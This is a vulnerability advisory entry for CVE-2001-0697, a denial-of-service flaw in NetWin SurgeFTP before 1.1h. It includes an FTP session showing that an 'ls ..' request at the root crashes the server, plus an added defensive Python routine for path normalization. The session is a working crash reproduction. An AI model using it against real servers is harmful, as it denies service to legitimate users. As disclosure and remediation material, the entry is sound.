Netwin SurgeFTP Malformed Request Denial of Service Vulnerability

Vulnerability ID: 1106237
Vulnerability type: Other
Published: 2001-03-01
Updated: 2005-05-02
CVE ID: CVE-2001-0697
CNNVD-ID: CNNVD-200109-070
Platform: Multiple
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/20659
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-070
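|Vulnerability details
NetWin SurgeFTP versions before 1.1h contain a vulnerability. A remote attacker can cause a denial of service (crash) via the 'ls ..' command.
|Exploit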
source: http://www.securityfocus.com/bid/2442/info

SurgeFTP is an FTP server distributed and maintained by Netwin. It is a configurable, easily maintained FTP server that runs on both UNIX and Windows platforms.

A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.

Therefore, a malicious user can deny service to legitimate users by sending the request described above to the FTP server.

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
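
A server-side guard for the condition shown in the session above, as an added example that is not part of the original advisory and not SurgeFTP code. The advisory does not state the root cause, so this assumes the listing argument must be normalized against the session's virtual root before any filesystem access; the function names are hypothetical, and the `/` to `/home` alias is taken from the login banner.

```python
# Added example (not SurgeFTP code): resolve an FTP listing argument against
# the session's virtual root so that ".." can never step above "/".
# Function names are hypothetical; the "/" -> "/home" alias mirrors the banner.

def resolve_virtual_path(cwd: str, arg: str) -> str:
    """Return the normalized virtual path for `arg` as seen from `cwd`.

    The result always starts with "/". A ".." at the virtual root is clamped
    to the root instead of yielding "/.." or an empty path.
    """
    if "\x00" in arg:
        raise ValueError("NUL byte in path argument")
    # Absolute arguments ignore cwd; relative ones are joined to it.
    combined = arg if arg.startswith("/") else cwd + "/" + arg
    parts = []
    for segment in combined.split("/"):
        if segment in ("", "."):
            continue              # skip empty and current-directory segments
        if segment == "..":
            if parts:
                parts.pop()       # go up one level, but never past the root
            continue
        parts.append(segment)
    return "/" + "/".join(parts)


def handle_list(cwd: str, arg: str, real_root: str):
    """Map a LIST argument to (reply_code, real_path or None).

    Malformed input gets a 501 reply rather than reaching the filesystem
    layer. Symlink containment is out of scope for this example.
    """
    try:
        vpath = resolve_virtual_path(cwd, arg)
    except ValueError:
        return 501, None
    real = real_root if vpath == "/" else real_root.rstrip("/") + vpath
    return 150, real


if __name__ == "__main__":
    # Constructed inputs, including the "ls .." request from the session.
    for cwd, arg in [("/", ".."), ("/", "/.."), ("/pub/a", "../../.."), ("/", "pub")]:
        print(cwd, repr(arg), "->", handle_list(cwd, arg, "/home"))
```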
|References

Source: XF
Name: surgeftp-listing-dos(6168)
Link: http://xforce.iss.net/static/6168.php
Source: BUGTRAQ
Name: 20010228SurgeFTPDenialofService
Link: http://www.securityfocus.com/archive/1/165816
Source: WIN2KSEC
Name: 20010301SurgeFTP1.0bDenialofService
Link: http://www.secadministrator.com/Articles/Index.cfm?ArticleID=20200
Source: netwinsite.com
Link: http://netwinsite.com/surgeftp/manual/updates.htm
Source: BID
Name: 2442
Link: http://www.securityfocus.com/bid/2442
